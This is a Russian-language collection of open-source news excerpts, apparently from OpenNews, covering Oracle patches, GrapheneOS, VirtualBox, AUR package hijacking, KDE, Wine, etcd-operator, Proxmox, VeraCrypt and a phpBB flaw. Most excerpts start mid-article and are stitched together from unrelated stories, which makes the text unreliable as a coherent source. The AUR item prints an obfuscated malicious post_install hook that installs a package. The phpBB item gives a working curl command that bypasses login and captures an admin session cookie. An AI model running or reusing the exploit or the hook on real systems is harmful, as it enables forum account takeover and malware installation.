Некоторые проблемы:

• 1 уязвимость в сервере MySQL, которая может быть эксплуатирована удалённо без прохождения аутентификации. Проблема связана с обработкой соединений и имеет уровень опасности 7.5 из 10. Уязвимость устранена в выпусках MySQL Community Server 9.7.1 и 8.4.10.
• 10 уязвимостей в VirtualBox, три из которых помечены как опасные (7.5 из 10). Детали о характере уязвимостей не раскрываются, упоминается лишь, что они вызваны проблемами в реализации VVM, общих каталогов и устройства VMSVGA. Проблемы устранены в выпуске VirtualBox 7.2.10.
• Три уязвимости в Solaris. Одной из проблем (CVE-2026-46978) присвоен критический уровень опасности (10 из 10). Уязвимость присутствует в Remote Administration Daemon и может использоваться для удалённого получения прав администратора через отправку специальной оформленного запроса по HTTPS. Менее опасные уязвимости затрагивают файловую систему (опасность 7.1 из 10) и стандартные библиотеки (4.4 из 10). Уязвимости устранены в обновлении Solaris 11.4 SRU93.
• В Java SE проблем в отчёте не отмечено и корректирующие выпуски Java SE не сформированы.

1. OpenNews: Выпуск VirtualBox 7.2.10
2. OpenNews: Уязвимости в Java SE, MySQL, VirtualBox и других продуктах Oracle
3. OpenNews: Oracle опубликовал бесплатную редакцию Solaris 11.4.90 CBE

Сегодня планируют выпустить финальный релиз GrapheneOS на базе Android 16 QPR2, после чего завтра предложить начальную версию на базе Android 17. В версии GrapheneOS на базе Android 17 обеспечена поддержка всех устройств, для которых формировались сборки на базе ветки Android 16, но протестированы сборки пока только на смартфонах Pixel 6a, 7, 7a, 8, 10a, 10 и 10 Pro Fold.

GrapheneOS развивает ответвление от кодовой базы AOSP (Android Open Source Project), включающее многие экспериментальные технологии, связанные с усилением изоляции приложений, управлением доступом, блокированием проявления уязвимостей и усложнением работы эксплоитов. Среди прочего, в платформе задействована собственная реализация malloc, модифицированный вариант libc с защитой от повреждения памяти и более жёсткое разделение адресного пространства процессов. В ядре Linux включены дополнительные механизмы защиты, такие как канареечные метки в slub для блокирования переполнения буферов. Для усиления изоляции приложений задействованы SELinux и seccomp-bpf. Пользователь может выборочно ограничивать доступ приложений к сетевым операциям, датчикам, адресной книге и периферийным устройствам (USB, камере).

1. OpenNews: Motorola и GrapheneOS объявили о сотрудничестве в области создания защищённых смартфонов
2. OpenNews: Давление французских силовых ведомств на GrapheneOS из-за отказа интегрировать бэкдор
3. OpenNews: Создан форк systemd без хранения возраста. GrapheneOS отказался верифицировать возраст
4. OpenNews: В Android-платформе GrapheneOS появилась возможность создания деструктивного PIN-кода
5. OpenNews: Выпуск мобильной платформы Android 17

• В дополнения для гостевых систем и хост-окружений с Linux добавлена начальная поддержка ядра Linux 7.1, включены дополнительные исправления для дистрибутива RHEL 9.8, устранён сбой при при сборке модулей ядра в openSUSE 16.0. Добавлена поддержка сборки исходного кода с использованием ассемблера NASM вместо YASM.
• В дополнениях для хост-окружений с Linux решена проблема, мешавшая запуску виртуальных машин из-за сбоев в ядре.
• В дополнения для гостевых систем с Linux добавлена начальная поддержка протокола Extended Data Control для доступа к буферу обмена в гостевых системах с KDE Plasma, использующих Wayland. Налажена сборка модуля vboxvideo при использовании ядер 7.0 и 7.1.
• Устранён сбой загрузки виртуальных машин с CentOS 10 с сообщением об отсутствии в CPU поддержки субархитектуры x86-64-v3.
• Решены проблемы с загрузкой на системах ARM виртуальных машин, которым назначено менее 1024 MiB ОЗУ.
• Устранена проблема, из-за которой устройство VIRTIO-SCSI не распознавалось в гостевой системе как SSD.
• Решены проблемы в коде эмуляции сетевого адаптера E1000, не позволявшие загрузить OS/2 в гостевой системе.
• В дополнения для гостевых систем с OS/2 исправлены проблемы с автоматическим монтированием совместно используемых каталогов и неработой буфера обмена.

Дополнение: Помимо перечисленных изменений в новой версии устранено 10 уязвимостей (максимальный уровень опасности 7.5 из 10), подробности о которых пока не раскрываются, упоминается лишь, что они вызваны проблемами в реализации VVM, общих каталогов и устройства VMSVGA.

1. OpenNews: Уязвимости в Java SE, MySQL, VirtualBox и других продуктах Oracle
2. OpenNews: Выпуск VirtualBox 7.2.8
3. OpenNews: В VirtualBox добавлена предварительная поддержка работы поверх гипервизора KVM
4. OpenNews: VirtualBox адаптирован для работы поверх гипервизора KVM

В новом выпуске:

• Добавлена поддержка TrueType-шрифтов с использованием библиотеки FreeType.
• Через интеграцию библиотеки stb_image обеспечена поддержка различных форматов изображений.
• Проект стал модульным - по умолчанию в составе движка теперь собираются три библиотеки: LDL, LDL_Image и LDL_Ttf.
• Добавлены новые примеры для работы со шрифтами.
• Началась подготовка полноценной документации.
• Проведён рефакторинг кода для повышения стабильности и производительности.
• Исправлен ошибки и и недоработки в 2D- и 3D-рендерах.

В следующих выпусках планируется завершить работу над документацией, расширить возможности 3D-рендера и предоставить обвязки для языков Python, C# и Object Pascal.

1. OpenNews: Релиз графической библиотеки LDL 0.2, оптимизированной для маломощных систем
2. OpenNews: Релиз мультимедийной библиотеки LDL 0.1, оптимизированной для маломощных систем
3. OpenNews: Проект SDL3Lite развивает версию библиотеки SDL3 с поддержкой старых систем
4. OpenNews: Опубликована мультимедийная библиотека LDL, оптимизированная для маломощных систем

Заявки принимаются до 15 августа 2026 года. Награждение лауреатов состоится 2-4 октября на XXII конференции разработчиков свободных программ. В своё время при поддержке Института Логики зародился IPlabs Linux Team, ставший в дальнейшем основой для ALT Linux.

Сообщения, отправленные через форму на Hackerone и email [email protected] в указанное время сопровождающими рассматриваться не будут. Возможность отправки pull-запросов и сообщений о проблемах через GitHub останется доступна, но разбор накопившихся сообщений об уязвимостях начнётся только после 3 августа.

1. OpenNews: AI-модель Claude Mythos не продемонстрировала особых достижений при поиске уязвимостей в Curl
2. OpenNews: Проект Curl избавился от использования функции strcpy в коде
3. OpenNews: Проблемы из-за подготовленных AI-инструментами отчётов об уязвимостях
4. OpenNews: В CVE опубликованы отчёты о ложных уязвимостях в curl, PostgreSQL и других проектах
5. OpenNews: Anthropic анонсировал AI-модель Claude Mythos, умеющую создавать рабочие эксплоиты

Для очистки ядра от несвободных частей проектом Linux-libre создан универсальный shell-скрипт, который содержит тысячи шаблонов для определения наличия бинарных вставок и исключения ложных срабатываний. Также доступны для загрузки готовые патчи, созданные на основе использования вышеупомянутого скрипта. Ядро Linux-libre рекомендовано для использования в дистрибутивах, соответствующих критериям Фонда СПО по построению полностью свободных дистрибутивов GNU/Linux. Например, Linux-libre используется в таких дистрибутивах, как GNU Guix System, Dragora Linux, Trisquel, Dyne:Bolic, gNewSense, Parabola, Musix и Kongoni.

В выпуске Linux-libre 7.1-gnu обновлён код чистки блобов в драйверах Nova-core, btmtk, qat_6xxx, amdgpu, m88ds3103, saa7164, r8169, ath12k, mt792x и mt7996. Решены проблемы со сборкой при использовании Rust. Обеспечена чистка блобов в новых драйверах для чипов Lontium LT8713SX DP MST и Realtek 802.11be 8922D. Произведена чистка имён блобов в dts-файлах (devicetree) для архитектуры Aarch64. Прекращена чистка драйверов fore200e, acenic, yam, smc91c92_cs и speedfax, которые были удалены из состава ядра.

1. OpenNews: Релиз полностью свободного Linux-дистрибутива PureOS 11, используемого на смартфонах Librem
2. OpenNews: Релиз ядра Linux 7.0
3. OpenNews: Доступен полностью свободный Linux-дистрибутив Trisquel 12.0
4. OpenNews: Релиз ядра Linux 7.1

Для захвата пакетов атакующие использовали предоставляемую в AUR возможность принимать сопровождение над пакетам, оставшихся без сопровождающих и имеющих статус "orphaned". Подобная возможность предоставлялась без ограничений и проверок любому желающему. В настоящее время в AUR размещено 107406 пакетов, из которых 13050 имеют статус "orphaned" (неделю назад было 15261). За последнюю неделю в репозитории было обновлено 5578 пакетов, а за предыдущую - 3446. В репозитории насчитывается 141967 зарегистрированных пользователей и 69 сопровождающих пакеты (в предыдущую неделю было 140949 пользователей и 69 сопровождающих).

1. OpenNews: В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета
2. OpenNews: Атакующие скомпрометировали 1577 пакетов в репозитории AUR
3. OpenNews: В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
4. OpenNews: В AUR-репозитории Arch Linux выявлены вредоносные пакеты
5. OpenNews: Arch Linux временно оставил доступ к сайту только через IPv6 из-за DDoS-атаки

   post_install() {
       $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
   }

Тем временем зафиксирована ещё одна атака на AUR, на этот раз вместо подстановки вредоносного ПО в несколько десятков пакетов, оставшихся без сопровождающего, был добавлен вывод нецензурного сообщения на русском языке с оскорблением пользователей и предложением поменять дистрибутив или перестать использовать AUR.

1. OpenNews: Атакующие скомпрометировали 1577 пакетов в репозитории AUR

Изменения в ветке KDE Plasma 6.8:

• Расширены возможности для определения использования тёмных тем оформления в приложениях на базе GTK 2 и применения к ним тёмных вариантов тем пиктограмм для исключения ситуаций когда в тёмном интерфейсе показываются светлые пиктограммы.
• В компоненты для интеграции с web-браузерами добавлена поддержка Flatpak-пакетов с Microsoft Edge.
• Увеличена верхняя область захвата для перетаскивания не раскрытых на весь экран окон приложений с темой оформления Breeze, по аналогии с тем, как ранее были увеличены области захвата за низ и боковые грани.
• Реализовано отображение уведомления о низком заряде аккумуляторов подключённых устройств даже при запуске программ в полноэкранном режиме, чтобы пользователь не пропустил полный разряд.
• В эффектах "Peek at Desktop" и "Window Aperture" учтены системные настройки скорости анимации.
• Представление информации и формулировки в диалогах предоставления прав доступа через систему порталов XDG (xdg-desktop-portal-kde) унифицированы с другими диалогами KDE.
• В хранителе экрана обеспечен учёт таймаута, заданного в системе через параметры PAM (Pluggable Authentication Modules), без добавления сверх них дополнительных задержек. Добавлен индикатор включения режима для людей с ограниченными возможностями, увеличивающего время удержания клавиш для срабатывания нажатия.
• В KDE Frameworks 6.28 улучшено выравнивание эскизов в диалогах открытия и сохранения файлов, а также разрешено использование по-отдельности клавиши Meta для открытия обзорного режима в KWin.
• В Qt 6.11.2 устранена ошибка, приводившая к аварийному завершению KDE Plasma при загрузке показываемых в виджете Media Player изображений обложек альбомов для контента во внешних сервисах, таких как YouTube.

1. OpenNews: Недельный отчёт о разработке KDE
2. OpenNews: Размер кодовой базы KDE достиг 8 млн строк кода
3. OpenNews: Начало разработки KDE Plasma 6.8. Улучшение удалённой работы с рабочим столом в KDE
4. OpenNews: Бета-выпуск KDE Plasma 6.7
5. OpenNews: Фонд Sovereign выделил почти 1.3 миллиона евро на развитие KDE

Наиболее важные изменения:

• В драйвер winewayland, позволяющий использовать Wine в окружениях на базе протокола Wayland, добавлена поддержка Wayland-протокола alpha-modifier-v1, позволяющего приложениям менять уровень прозрачности поверхности и выносить операции по обеспечению прозрачности на сторону композитного сервера.
• В winewayland реализована поддержка многослойных окон (WS_EX_LAYERED), компонуемых из нескольких слоёв для реализации эффектов, таких как полупрозрачность и непрямоугольная форма окна (в wine пока реализована только полупрозрачность).
• В winewayland добавлены hints-флаги для задания максимального и минимального размера статичных окон, размер которых не может менять пользователь.
• Вместо криптографической библиотеки TomCrypt в состав включена библиотека SymCrypt, развиваемая компанией Microsoft и поддерживающая алгоритмы постквантового шифрования. Переход на SymCrypt позволил задействовать ассемблерные оптимизации операций шифрования для архитектур x86-64, ARM64, ARM и i386.
• Продолжена работа по размещению в разделяемой памяти структур данных библиотеки user32, связанных с окнами.
• Улучшена совместимость с VBScript.
• В winevulkan осуществлён переход на использование спецификации Vulkan 1.4.353. В wined3d для инициализации поддержки Vulkan задействовано расширение VK_KHR_external_fence_capabilities.
• Решена проблема со скрытием файлов, имя которых начинается с точки, в диалоге открытия файла.
• Устранены регрессии, нарушавшие нормальную работу многопоточных приложений, использующих функцию SendMessage().
• Закрыты отчёты об ошибках, связанные с работой приложений: uTorrent 3.x, Foxit Reader 8.x, Foxit PhantomPDF Business v10.0, winmine.exe, Guitar Pro v8.1.3, Sunlogin, uSimmics, MS-Money 2000.
• Закрыты отчёты об ошибках, связанные с работой игр: Space Empires V, Wreckfest, Battle.Net, Total War: Shogun 2, Spider-Man Remastered, Yesterday Origins, Think or Swim, Gray Matter, Istaria.

Дополнительно можно отметить выпуск приложения Startwine-Launcher 423, развиваемого для запуска в Linux-системах программ и игр, собранных для платформы Windows. Основной целью разработки StartWine-Launcher было упрощение процесса создания новичками префиксов Wine, - наборов библиотек и зависимостей Windows, необходимых для работы Windows-приложений в Linux. Код StartWine-Launcher написан на языке Python и распространяется под лицензией GPLv3. Интерфейс реализован на основе библиотеки GTK.

В новой версии Startwine-Launcher обновлён список версий Wine, а также обновлены префиксные конфигурации, библиотеки и драйверы в контейнере. В utils добавлены библиотеки Steam для совместимости со старыми играми. Исправлены ошибки в скрипте установки, коде обновления установленных данных приложения и во вспомогательных функциях в sw_runlib.

1. OpenNews: Новые версии Wine 11.10 и Vkd3d 2.0
2. OpenNews: Adobe Lightroom CC при помощи AI адаптирован для работы в Linux через Wine
3. OpenNews: Стабильный релиз Proton 10.0, пакета для запуска Windows-игр в Linux
4. OpenNews: бета-версия Proton 11.0

Главное изменение в новом etcd-operator - отказ от StatefulSet для управления узлами. Теперь etcd-operator напрямую работает со штатным Membership API etcd (MemberAdd, MemberPromote и MemberRemove) и сам добавляет участников, повышает learner до голосующего узла и выводит узлы из кворума, что даёт etcd-operator полный контроль над составом кластера.

Параллельно разработчики проекта etcd развивают с нуля собственный официальный etcd-operator. По функциональности официальный etcd-operator пока уступает варианту от проекта Cozystack. Так как прежняя реализация etcd-operator уже работает в рабочих окружениях и используется в Cozystack и Kamaji, её развитие было продолжено отдельно от официальной реализации от проекта etcd.

Развиваемый проектом Cozystack вариант управляет кластерами etcd через два ресурса. EtcdCluster описывает желаемое состояние: число реплик, версию etcd, параметры хранилища, TLS, аутентификацию и настройки etcd. EtcdMember создаётся для каждого узла кластера и владеет его Pod и PVC. В отличие от типовых решений etcd-operator не использует StatefulSet и обслуживает независимо Pod и PVC каждого узла. Состав кластера меняется через API Membership etcd: etcd-operator добавляет новые узлы как learner (MemberAdd), затем повышает их до голосующих участников (MemberPromote). Удаление проходит через операцию MemberRemove, с корректным выводом из кворума. При приостановке работы кластера узлы сохраняют свою идентичность.

Основные возможности:

• развёртывание кластера и масштабирование в обе стороны, по одному узлу за раз: новые узлы стартуют в режиме learner, удаление корректно выводит их из кворума;
• остановка кластера без потери данных (spec.replicas: 0) и возобновление работы с теми же идентификаторами кластера и узлов;
• хранение данных в PVC по умолчанию или в tmpfs, если данные можно восстановить заново; при потере Pod оператор автоматически пересоздаёт узлы с хранилищем в памяти;
• раздельная настройка TLS для клиентских и межузловых соединений: можно подключить свои сертификаты или поручить оператору выпуск и продление сертификатов через cert-manager;
• аутентификация с единственным пользователем root; его учётные данные задаются через хранилище учётных данных ("Secret");
• создание снапшотов в S3 или PVC через ресурс EtcdSnapshot и восстановление кластера из снапшота при первом развёртывании;
• автоматический PodDisruptionBudget, который не даёт операциям чистки нарушить кворум;
• валидация спецификаций средствами apiserver через CEL-выражения в CRD, без webhook и зависимости от cert-manager;
• подресурс /scale для kubectl scale и VerticalPodAutoscaler, порт метрик 2381, проброс привязок и topologySpreadConstraint;
• плагин kubectl-etcd для повседневных задач (day-2 operations) после развёртывания кластера.

Изменения по сравнению со старой реализацией (v1alpha1):

• API-группа сменилась с etcd.aenix.io на etcd-operator.cozystack.io;
• вместо StatefulSet оператор использует отдельный ресурс EtcdMember для каждого узла;
• произвольный словарь spec.options заменён типизированным набором параметров: quota-backend-bytes, режим и интервал автокомпактификации, snapshot-count;
• ресурс EtcdBackup переименован в EtcdSnapshot, семантика сохранена;
• валидация перенесена с webhook на CEL-правила в CRD;
• сервис кластера переведён в режим headless, чтобы у узлов были стабильные DNS-имена.

Миграция проходит на месте с помощью etcd-migrate. Инструмент адаптирует работающий кластер старого оператора без переноса данных, перезапуска Pod и потери кворума, меняя только владельцев объектов, метки и аннотации. После этого новый оператор берёт управление на себя. Клиенты, которые обращаются к кластеру по DNS-имени, продолжают работать без изменений.

Реализация etcd-operator от Cozystack закрывает большинство пунктов плана развития официального etcd-оператора проекта etcd:

1. Создание нового кластера etcd, например из 3 или 5 узлов, с указанной версией etcd — реализовано.
2. Определение состояния работоспособности кластера — реализовано.
3. Поддержка TLS-шифрования соединений, включая продление сертификатов — реализовано.
4. Обновление в пределах патч-версий или на одну минорную версию — реализовано частично: значение spec.version применяется только к новым узлам.
5. Масштабирование в обе стороны, например 1 -> 3 -> 5 узлов и обратно — реализовано.
6. Настройка параметров etcd через флаги или переменные окружения — реализовано как закрытый типизированный набор параметров.
7. Восстановление одного отказавшего члена кластера, если кворум сохраняется — реализовано частично: автоматической замены членов с повреждённым PVC пока нет.
8. Восстановление после отказа нескольких членов кластера и потери кворума — не реализовано, работа запланирована.
9. Создание резервной копии кластера по запросу — реализовано.
10. Периодическое резервное копирование кластера — сознательно вынесено за рамки оператора: периодические снапшоты предлагается запускать штатным CronJob.

Кроме того, v1alpha2 даёт возможности, которых нет в плане развития официального оператора:

• остановка кластера до нуля реплик, пауза и возобновление с сохранением идентичности кластера и узлов;
• хранилище в памяти (tmpfs) с автоматической заменой узлов силами оператора;
• валидация на стороне apiserver через CEL, без webhook и зависимости от сертификатов;
• автоматический PodDisruptionBudget для голосующих узлов;
• подресурс /scale с заполненным status.selector, чтобы напрямую работали kubectl scale и VerticalPodAutoscaler.targetRef;
• проброс параметров планирования affinity и topologySpreadConstraints, а также объединение additionalMetadata во всех объектах, которые создаёт оператор;
• инструмент миграции с прежнего оператора без остановки кластера;
• плагин kubectl-etcd для эксплуатационных задач.

1. OpenNews: Проект etcd-await-election для запуска процессов с учётом выбора лидирующего экземпляра
2. OpenNews: Первый альфа-выпуск etcd-оператора для Kubernetes
3. OpenNews: Разработка распределённого хранилища etcd переведена в организацию CNCF
4. OpenNews: Утечка параметров аутентификации через незащищённые серверы etcd
5. OpenNews: Выпуск распределенной системы хранения конфигурации etcd 3.0

Установочный ISO-образ доступен для свободной загрузки. Специфичные для дистрибутива компоненты открыты под лицензией AGPLv3. Для установки обновлений доступен как платный репозиторий Enterprise, так и два бесплатных репозитория, которые отличаются уровнем стабилизации обновлений. Системная часть дистрибутива базируется на пакетной базе Debian. Возможна установка компонентов Proxmox Mail Gateway поверх уже работающих серверов на базе Debian.

Proxmox Mail Gateway функционирует как прокси-сервер, выступающий в роли шлюза между внешней сетью и внутренним почтовым сервером на базе MS Exchange, Lotus Domino или Postfix. Имеется возможность управления всеми входящими и исходящими потоками почтовой переписки. Все логи переписки разбираются и доступны для анализа через web-интерфейс. Предоставляются как графики для оценки общей динамики, так и различные отчёты и формы для получения информации о конкретных письмах и статусе доставки. Поддерживается создание кластерных конфигураций для обеспечения высокой доступности (ведение синхронизированного резервного сервера, данные синхронизируются через SSH-туннель) или балансировки нагрузки.

Предоставляется набор средств для обеспечения защиты, фильтрации спама, фишинга и вирусов. Для блокирования вредоносных вложений применяется ClamAV и база Google Safe Browsing, а против спама предлагается комплекс мер на основе SpamAssassin, включающий поддержку обратной проверки отправителя, SPF, DNSBL, серые списки, систему байесовской классификации и блокировку по базе спамерских URI. Для легитимной корреспонденции предоставляется гибкая система фильтров, позволяющих определять правила обработки почты в зависимости от домена, получателя/отправителя, времени получения и типа содержимого.

Основные новшества:

• Осуществлена синхронизация с пакетной базой Debian 13.5. Ядро Linux обновлено до выпуска 7.0. Реализация файловой системы ZFS обновлена до OpenZFS 2.4. Обновлены версии системы фильтрации спама SpamAssassin 4.0.2, антивирусного пакета ClamAV 1.4.4 и СУБД PostgreSQL 17.
• Улучшен web-интерфейс для управлением помещением проблемных писем в карантин. Интерфейс оптимизирован для работы как со стационарных компьютеров, так и с мобильных устройств. Пользователям предоставлена возможность пометки просмотренными писем, помещённых в карантин из совместно используемых почтовых ящиков, для того чтобы не проводить двойную проверку разными людьми. В отчёте о помещении в карантин теперь показывается не только финальный спамерский вес, но и по-отдельности положительные и отрицательные составляющие для более ясного понимания причины фильтрации письма.

  Добавлена опция для загрузки изображений, присутствующих в помещённых в карантин письмах, только после явного запроса их показа нажатием кнопки "Load Images". В панель администратора добавлена опция "Copy Link" для получения ссылки для доступа к письму, находящемуся в карантине.

• Добавлена поддержка шифрования резервных копий на стороне клиента и управления ключами, используемыми для шифрования. В данном режиме шифруются не только резервируемые данные, но и сопутствующие метаданные, такие как настройки email, правила фильтрации и статистика. Имеется опциональная возможность задания мастер ключа для восстановления.
• Добавлена опция для инициирования проверки резервной копии и просмотра состояния шифрования и проверки для каждого снапшота.
• Реализована поддержка добавления объявлений, показываемых перед входом в интерфейс администрирования, например, для вывода примечаний об использовании.
• Добавлена поддержка сохранения в лог для каждого письма адреса отправителя, преданного во время SMTP-сеанса, а также декодированного содержимого заголовков From, To и Subject для проведения аудита.

1. OpenNews: Выпуск Proxmox VE 9.2, дистрибутива для организации работы виртуальных серверов
2. OpenNews: Доступен дистрибутив Proxmox Backup Server 4.2
3. OpenNews: Представлен Proxmox Datacenter Manager 1.0
4. OpenNews: Выпуск дистрибутива Proxmox Mail Gateway 8.2

Среди изменений в новой версии:

• Обеспечена возможность воспроизводимой сборки пакетов DEB и RPM, позволяющая удостовериться, что бинарные сборки созданы из предоставляемого исходного кода.
• Для не системных разделов добавлена поддержка альтернативной функции формирования ключа (KDF, Key Derivation Function) Argon2id. В документации и интерфейсе пользователя вместо "PKCS-5 PRF" задействован термин KDF.
• Ужесточена проверка некорректных данных в парсерах XML и TLV.
• Добавлена поддержка сборки с использованием механизма FUSE3 (Filesystem in Userspace).
• Предоставлена возможность выбора работающего на уровне ядра Linux драйвера ntfs3 для точек монтирования с NTFS ("--filesystem=kernel-ntfs" и "-m kernelntfs").
• Реализовано распараллеливание операций при автоматическом определении KDF.
• Для обычных файловых контейнеров задействован режим быстрого форматирования (Quick Format) с использование функции ftruncate() для пометки пустых областей.
• В версии для платформы Windows устранено аварийное завершение при переходе в спящий режим на системах с Windows 11 25H2, улучшена обработка ввода/вывода, ускорено монтирование при автоопределении KDF, добавлена поддержка EFI-загрузчиков заверенных новым сертификатом Microsoft UEFI CA 2023, реализована опция "/protectScreen" для отключения режима блокировки создания скриншотов, добавлена опция "/enableIME" для включения IME (Input Method Editor). Добавлен VeraCrypt C/C++ SDK для создания разделов VeraCrypt из сторонних программ.
• Устранена уязвимость (CVE-2026-53762), проявляющаяся только при сборке с опцией "WOLFCRYPT=1", не применяемой по умолчанию. Уязвимость значительно упрощает подбор пароля к шифрованным разделам из-за использования ключей SHA-256 и SHA-512 на базе функции формирования ключа HKDF вместо PBKDF2-HMAC, игнорирующей заданное в настройках число итераций и PIM (Personal Iterations Multiplier).
• Устранена специфичная для Windows уязвимость (CVE-2026-54073), упрощающая определение наличия скрытых зашифрованных разделов из-за использования типового шаблона записи пустых областей. Тем временем, в поставляемой в Windows штатной системе шифрования разделов BitLocker выявлена ещё не исправленная (0-day) критическая уязвимость "GreatXML" (имеется эксплоит), позволяющая получить полный доступ к зашифрованному разделу BitLocker через манипуляции с разделом Recovery на системах с включённым Windows Defender Offline Scan.

1. OpenNews: Выпуск системы шифрования дисковых разделов VeraCrypt 1.26.24
2. OpenNews: Microsoft заблокировал учётные записи для заверения релизов VeraCrypt и WireGuard
3. OpenNews: TrueCrypt закрыт из-за потери интереса к проекту. Инициатива по созданию форка
4. OpenNews: На сайте TrueCrypt опубликовано заявление о небезопасности и закрытии проекта
5. OpenNews: Проект CipherShed выпустил релиз ответвления TrueCrypt 0.7.4

При атаке на обычных пользователей можно получить доступ к приватной переписке и возможности отправлять сообщения от имени пользователя. При атаке на модераторов и администраторов можно удалять чужие сообщения, просматривать IP-адреса и email, читать приватную переписку, но нельзя зайти в интерфейс администратора и получить доступ к хосту.

Детали об уязвимости не приводятся, но при помощи AI на основе исправления уже воссоздан метод эксплуатации, основанный на обращении к обработчику "login_link" с выставлением метода аутентификации "auth_provider=apache" и подстановкой логина через Basic Auth, после чего PHP выставит переменную окружения "PHP_AUTH_USER=логин", а phpBB извлечёт из неё логин пользователя без проверки пароля. Например, для получения идентификатора сессии пользователя admin и сохранения его в файл cookies.txt можно выполнить код:

   curl -i -s \
     -c cookies.txt \
     -b cookies.txt \
     -u 'admin:anything' \
     -d 'login=Login&login_username=admin&login_password=anything' \
     'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

1. OpenNews: Уязвимость в движке для создания форумов phpBB
2. OpenNews: Инфраструктура свободного проекта phpBB подверглась взлому
3. OpenNews: Взломан сайт проекта phpBB, захвачено 400 тыс. аккаунтов пользователей